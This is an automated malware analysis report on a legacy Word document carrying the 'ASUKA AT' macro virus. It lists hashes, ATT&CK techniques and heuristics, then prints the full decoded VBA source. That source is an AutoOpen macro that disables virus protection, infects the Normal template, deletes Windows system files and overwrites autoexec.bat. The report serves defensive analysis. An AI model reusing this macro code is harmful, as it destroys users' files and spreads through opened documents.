Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 11b1906902c393ab…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 1999-06-03 06:13:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: a264daabcc2d83519eb3f4e64be9a15e
SHA-1: aa505cae199ae9bd5345a17237303d0236193c62
SHA-256: 11b1906902c393ab74129993aefb026b7bf1cd969c215d108b909e758da8cfa1
Risk score: 80

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, indicating it's designed to execute automatically when the document is opened. The macro attempts to disable virus protection and create a malicious 'c:\autoexec.bat' file, which would execute the 'ASUKA AT' payload. This suggests a classic macro-based malware delivery mechanism.

Heuristics (3)

  • VBA macros detected (severity: medium; 1 related finding) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it does not attribute a downloader or a parser CVE.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3203 bytes
SHA-256: 31e73b283619827e9b0b519dc0d5d8f525cdcc8ca5aaee71bc784db0708a68e6
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Módulo1"
Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Sub AutoOpen()
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
ShowVisualBasicEditor = False
Dim DirName As String
Dim Shinji As String
    DirName = Donde_esta_Windows()
    Shinji = DirName
On Error GoTo RutinaDeError
ActiveDocument.SaveAs FileName:=NormalTemplate.Path & "\" & NormalTemplate.Name, FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Kill (Shinji + "command.com")
Kill (Shinji + "winfile.exe")
Kill (Shinji + "\system\appwiz.cpl")
Kill (Shinji + "\system\sysdm.cpl")
'the files go here: c:\windows\explorer.exe, c:\windows\winfile.exe, c:\windows\command.com, c:\windows\system\appwiz.cpl, c:\windows\system\sysdm.cpl, remember to prepend Shinji
Open "c:\autoexec.bat" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "ECHO          *********************************************************"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                    ViRuS: ASUKA AT                    *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                         AUTOR:                        *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                  ©©©© ZaHACKieL  ©©©©                 *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                      LIMA - PERU                      *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                       03/JUN/00                       *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                     ®®®®®®®®®®®®®®                    *"
Print #1, "ECHO          *                     §            §                    *"
Print #1, "ECHO          *                     §   A.B.G    §                    *"
Print #1, "ECHO          *********************************************************"
Print #1, "pause"
Close #1
Application.Visible = False
RutinaDeError:
Exit Sub
End Sub

Function Donde_esta_Windows() As String
    Dim Temp As String
    Dim Ret As Long
    Const MAX_LENGTH = 145

    Temp = String$(MAX_LENGTH, 0)
    Ret = Donde_esta_Windowsdirectory(Temp, MAX_LENGTH)
    Temp = Left$(Temp, Ret)
    If Temp <> "" And Right$(Temp, 1) <> "\" Then
        Donde_esta_Windows = Temp & "\"
    Else
        Donde_esta_Windows = Temp
    End If
End Function